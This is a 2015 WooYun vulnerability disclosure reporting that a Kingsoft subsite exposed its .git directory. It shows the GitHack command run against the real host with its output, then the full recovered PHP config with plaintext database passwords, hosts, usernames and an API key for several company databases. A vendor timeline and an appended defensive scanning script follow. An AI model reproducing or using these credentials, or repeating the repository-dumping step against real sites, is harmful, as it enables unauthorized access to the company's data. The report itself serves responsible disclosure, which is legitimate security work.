
Vulnerability summary

Defect ID: wooyun-2015-0123857

Title: A Kingsoft subsite leaks its database configuration file through an exposed .git directory

Vendor: Kingsoft Duba (金山毒霸)

Author: JiuShao

Submitted: 2015-07-01 11:23

Fixed: 2015-08-15 11:34

Published: 2015-08-15 11:34

Type: Sensitive information disclosure

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2015-07-01: Details sent to the vendor; awaiting vendor handling
2015-07-01: Vendor confirmed; details visible only to the vendor
2015-07-11: Details disclosed to core white hats and relevant domain experts
2015-07-21: Details disclosed to regular white hats
2015-07-31: Details disclosed to intern white hats
2015-08-15: Details disclosed to the public

Brief description:

The exposed .git directory was restored locally with lijiejie's tool (GitHack).

Details:

http://popo.wan.ijinshan.com/.git/config

C:\Python27>python 1/GitHack.py http://popo.wan.ijinshan.com/.git/
[+] Download and parse index file ...
[OK] .gitignore
[OK] Conf/config.php
[OK] Lib/Action/GlAction.class.php
[OK] Lib/Action/ImportAction.class.php
[OK] Lib/Action/RejectAction.class.php
[OK] Lib/Action/PopoAction.class.php
[OK] Lib/Helper/PopoHelper.class.php
[OK] Lib/Action/TestAction.class.php
[OK] Lib/Helper/ImportHelper.class.php
[OK] Lib/Helper/GlHelper.class.php
[OK] ThinkPHP/Extend/Library/ORG/Net/IpLocation_Bootstrap.class.php
[OK] ThinkPHP/Extend/Library/ORG/Net/IpLocation.class.php
[OK] ThinkPHP/Lib/Driver/Cache/CacheMemcache.class.php
[OK] favicon.ico
[OK] cli.php
[OK] index.php
[OK] start.sh
[OK] ThinkPHP/Extend/Library/ORG/Net/UTFWry.dat


<?php
return array(
// url
'URL_MODEL' => 2,
'URL_CASE_INSENSITIVE' => true,
// autoload config
'APP_AUTOLOAD_PATH' => '@.Common,@.Util,@.Helper',
// db
'DB_TYPE' => 'mysql',
'DB_HOST' => '10.10.0.177',
'DB_NAME' => 'popo_wan',
'DB_USER' => 'popo_wan',
'DB_PWD' => 'UtyuGBY72DXM',
'DB_PREFIX' => '',
'DB_KSAFE' => array(
'db_type' => 'mysql',
'db_user' => 'dbreader',
'db_pwd' => 'king+5688',
'db_host' => '119.147.146.239',
'db_port' => '3306',
'db_name' => 'infoc_ksafe'
),
'DB_KVIP' => array(
'db_type' => 'mysql',
'db_user' => 'dbreader',
'db_pwd' => 'king+5688',
'db_host' => '119.147.146.119',
'db_port' => '3306',
'db_name' => 'infoc_kvip'
),
'DB_WEIKAN' => array(
'db_type' => 'mysql',
'db_user' => 'gim_usr',
'db_pwd' => 'CNpPGY2jn187Sx67FhqppxRmNjh25WOC',
'db_host' => '114.112.68.238',
'db_port' => '3306',
'db_name' => 'GIM_DW'
),
// cache
'DATA_CACHE_TYPE' => 'Memcache',
'MEMCACHE_HOST' => 'tcp://192.168.2.172:11211',
'DATA_CACHE_TIME' => '0',
// log
'LOG_RECORD' => true,
'LOG_LEVEL' => 'INFO',
'LOG_TYPE' => 3,
// app
'API_KEY' => 'ZhQneW7P',
'URL_ROUTER_ON' => true,
'URL_ROUTE_RULES' => array(
'api/reject/index' => 'Reject/index',
'api/reject/set' => 'Reject/set',
'api/reject/cancel' => 'Reject/cancel'
),
'SESSION_AUTO_START' => false,
);
?>


Proof of vulnerability:

(screenshot: 1111.png)

(screenshot: 2222.png)

Remediation:

Just fix it.

Copyright notice: please credit JiuShao@WooYun when reposting.
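A deploy-time check in the spirit of the remediation above, added here as an example (not the report's or the vendor's code): it walks a document root, flags any .git directory that the web server would serve alongside the site, and flags PHP config entries carrying a non-empty DB_USER, DB_PWD or API_KEY value like the ones leaked in Conf/config.php. The sample tree, file contents and the password value are constructed for the demo.

```python
import os
import re
import tempfile

# Credential-bearing keys seen in the leaked ThinkPHP config above (compared case-insensitively).
SECRET_KEYS = {"DB_PWD", "DB_USER", "API_KEY"}
# Matches one 'KEY' => 'value' entry of a PHP config array.
ENTRY_RE = re.compile(r"'(?P<key>[A-Za-z_]+)'\s*=>\s*'(?P<val>[^']*)'")


def scan_docroot(docroot):
    """Walk a deployed document root and return sorted (kind, relative path, detail) findings.

    kind is "git_dir" for a .git directory that the web server would expose, or
    "secret" for a PHP file holding a non-empty credential-like value.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(docroot):
        if ".git" in dirnames:
            rel = os.path.relpath(os.path.join(dirpath, ".git"), docroot)
            findings.append(("git_dir", rel, ""))
            dirnames.remove(".git")  # the repo itself is the finding; do not descend into it
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for m in ENTRY_RE.finditer(text):
                if m.group("key").upper() in SECRET_KEYS and m.group("val"):
                    findings.append(("secret", os.path.relpath(path, docroot), m.group("key")))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample mirroring the report: a docroot with .git and Conf/config.php (placeholder password)."""
    root = tempfile.mkdtemp(prefix="docroot_")
    os.makedirs(os.path.join(root, ".git"))
    with open(os.path.join(root, ".git", "config"), "w") as fh:
        fh.write("[core]\n\trepositoryformatversion = 0\n")
    os.makedirs(os.path.join(root, "Conf"))
    with open(os.path.join(root, "Conf", "config.php"), "w") as fh:
        fh.write("<?php\nreturn array(\n'DB_TYPE' => 'mysql',\n'DB_USER' => 'popo_wan',\n"
                 "'DB_PWD' => 'placeholder-password',\n'DB_PREFIX' => '',\n);\n")
    return root


if __name__ == "__main__":
    for kind, path, detail in scan_docroot(build_sample_tree()):
        print(kind, path, detail)
```

Run it against the directory the web server actually serves; the fix is to deploy without the .git directory (or deny it at the web server) and to keep credentials out of files under the document root.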


Vendor response

Vendor assessment:

Severity: Medium

Rank: 8

Confirmed at: 2015-07-01 11:32

Vendor reply:

Received; handling it immediately.

Latest status:

2015-07-01: Fix completed.